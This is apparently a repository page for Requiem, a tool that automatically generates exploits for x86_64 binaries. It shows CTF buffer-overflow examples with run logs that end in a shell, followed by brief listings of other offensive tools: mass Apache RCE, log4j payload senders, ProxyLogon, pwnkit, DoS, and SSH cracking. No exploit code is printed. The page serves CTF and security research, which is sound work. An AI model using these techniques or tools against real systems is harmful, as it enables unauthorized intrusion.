🎻 Modularized exploit generation framework

Overview

Modularized exploit generation framework for x86_64 binaries


Overview

This project is still at early stage of development, so you might want to come back later...


Requiem is a modularized exploit generator for x86_64 binaries which emulates the target program with Qiling, and uses the user-provided PoC as the target program's input. During the target program's execution, Requiem monitors its I/O-related behaviors and employs taint analysis to collect information that can be later used for exploitation.

To use Requiem, a PoC must be provided because Requiem cannot perform symbolic execution. The target program will follow the execution path formed by the PoC, and when the target program reaches the crash state, Requiem will determine whether the crash state is exploitable by checking if RIP has been tainted.


If RIP has been tainted at the crash state, Requiem will generate an exploit which:

  • guides the target program to the exploitable state
  • exploits the program based on the strategy specified by the user.

Modularized?

Def: An exploitation "strategy" consists of a list of exploitation "techniques".

The idea is to implement some well-known exploitation techniqes as reusable and configurable "modules". The user can use the built-in techniques to exploit a x86_64 binary, or write a custom strategy/techniques to deal with Ad-hoc problems.

Implemented Techniques

  • ret2win (return to an arbitrary function specified by the user)
  • ret2csu (handling of different variants of __libc_csu_init is not implemented yet)
  • basic stack pivot (read(0, bss+n, 1024), pop rbp ; ret, leave ret)
  • advanced stack pivot (requires at least one call site of read())
  • GOT partial overwrite (overwrite LSB of [email protected] to acquire syscall, then sys_execve("/bin/sh", 0, 0))
  • mprotect + shellcode
  • ret2dlresolve
  • simple ASLR bypass (leak PIE/libc base addresses using available read primitives)
  • advanced ASLR bypass (leak PIE/libc base addresses with _IO_file_write when there are no read primitives)
  • ...

Implemented PoC Types

  • stdin
  • file
  • socket
  • ...

Dependencies

Installation

git clone https://github.com/aesophor/requiem
cd requiem
git submodule update --init --recursive

Examples

1. pwnable.tw: unexploitable (500 PTS)

The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.

source

#include <stdio.h>
#include <unistd.h>

int main() {
    sleep(3);
    char buf[4];
    read(0, buf, 256);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/unexploitable/unexploitable' 'examples/unexploitable/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 4 bytes
write primitives: [[4198745, 140737488412076, 256]]
write primitives: [[4198745, 140737488412076, 256]]
[=]    Generated exploit: examples/unexploitable/unexploitable_exploit.py
[=]    Executing exploit: examples/unexploitable/unexploitable_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/unexploitable/unexploitable': pid 402588
[*] Switching to interactive mode
$ ls
README.md  examples  libs  requiem  requiem.py
$

2. CS 2017 Fall: readme

The length of stack-buffer overflow is very limited.
Only the saved RBP and the return address is controllable by the attacker.

source

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    char buf[0x20];
    setvbuf(stdout, 0, _IONBF, 0);
    printf("overflow me:");
    read(0, buf, 0x30);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/readme/readme' 'examples/readme/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 32 bytes
write primitives: [[4198801, 140737488412064, 48]]
write primitives: [[4198801, 140737488412064, 48]]
[=]    Generated exploit: examples/readme/readme_exploit.py
[=]    Executing exploit: examples/readme/readme_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/readme/readme': pid 402513
[*] Switching to interactive mode
overflow me:$ ls
README.md  examples  libs  requiem  requiem.py
$
Owner
ᴀᴇꜱᴏᴘʜᴏʀ
M.S. Student @ NCTU. Interested in modern C++, kernel and pwning.
ᴀᴇꜱᴏᴘʜᴏʀ
CloudFlare reconnaissance, tries to uncover the IP behind CF.

CloudFlare reconnaissance, tries to uncover the IP behind CF.

Neospace 8 Dec 03, 2021
SSH Tool For OSINT and then Cracking.

sshmap SSH Tool For OSINT and then Cracking. Linux Systems Only Usage: Scanner Syntax: scanner start/stop/status - Sarts/stops/sho

Miss Bliss 5 Apr 04, 2022
Denial Attacks by Various Methods

Denial Service Attack Denial Attacks by Various Methods IIIIIIIIIIIIIIIIIIII PPPPPPPPPPPPPPPPP VVVVVVVV VVVVVVVV I::

Baris Dincer 9 Nov 26, 2022
CVE-2021-40346 integer overflow enables http smuggling

CVE-2021-40346-POC CVE-2021-40346 integer overflow enables http smuggling Reference: https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021

donky16 34 Nov 15, 2022
An intranet tool for easily intranet pentesting

IntarKnife v1.0 a tool can be used in intarnet for easily pentesting moudle hash spray U can use this tool to spray hash on a webshell IntraKnife.exe

4 Nov 24, 2021
Tools for converting Nintendo DS binaries to an ELF file for Ghidra/IDA

nds2elf Requirements nds2elf.py uses LIEF and template.elf to form a new binary. LIEF is available via pip: pip3 install lief Usage DSi and DSi-enhan

Max Thomas 17 Aug 14, 2022
Python library to prevent XSS(cross site scripting attach) by removing harmful content from data.

A tool for removing malicious content from input data before saving data into database. It takes input containing HTML with XSS scripts and returns va

2 Jul 05, 2022
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Pupy Installation Installation instructions are on the wiki, in addition to all other documentation. For maximum compatibility, it is recommended to u

7.4k Jan 04, 2023
Scan your logs for CVE-2021-44228 related activity and report the attackers

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs. search for malicious strings decode payloads print results to stdout or file report

js-on 2 Nov 24, 2022
Bug Alert: a service for alerting security and IT professionals of high-impact and 0day vulnerabilities

Bug Alert Bug Alert is a service for alerting security and IT professionals of h

BugAlert.org 208 Dec 15, 2022
ProxyLogon Pre-Auth SSRF To Arbitrary File Write

ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp lulz 117 Nov 28, 2022

A web-app helping to create strong passwords that are easy to remember.

This is a simple Web-App that demonstrates a method of creating strong passwords that are still easy to remember. It also provides time estimates how long it would take an attacker to crack a passwor

2 Jun 04, 2021
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 04, 2022
A signature parser for hikari's command handler tanjun.

tanchi A signature parser for hikari's command handler tanjun. Finally be able to define your commands without those bloody decorator chains! Example

sadru 11 Nov 17, 2022
阿里云accesskey利用工具

aliyun-accesskey-Tools 此工具用于查询ALIYUN_ACCESSKEY的主机,并且远程执行命令。 对于ALIYUN_ACCESSKEY利用方式可参考文章:记一次阿里云主机泄露Access Key到Getshell 工具截图 安装模块 pip install -r require

一灯老和尚 826 Jan 01, 2023
A collection of intelligence about Log4Shell and its exploitation activity

Log4Shell-IOCs Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell ex

Curated Intel 172 Nov 17, 2022
spring-cloud-gateway-rce CVE-2022-22947

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947) 1.installation pip3 install -r requirements.txt 2.Usage $ python3 spring-cloud-gateway

k3rwin 10 Sep 28, 2022
Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

elyesa 5 Nov 09, 2022
pwncat module that automatically exploits CVE-2021-4034 (pwnkit)

pwncat_pwnkit Introduction The purpose of this module is to attempt to exploit CVE-2021-4034 (pwnkit) on a target when using pwncat. There is no need

Dana Epp 33 Jul 01, 2022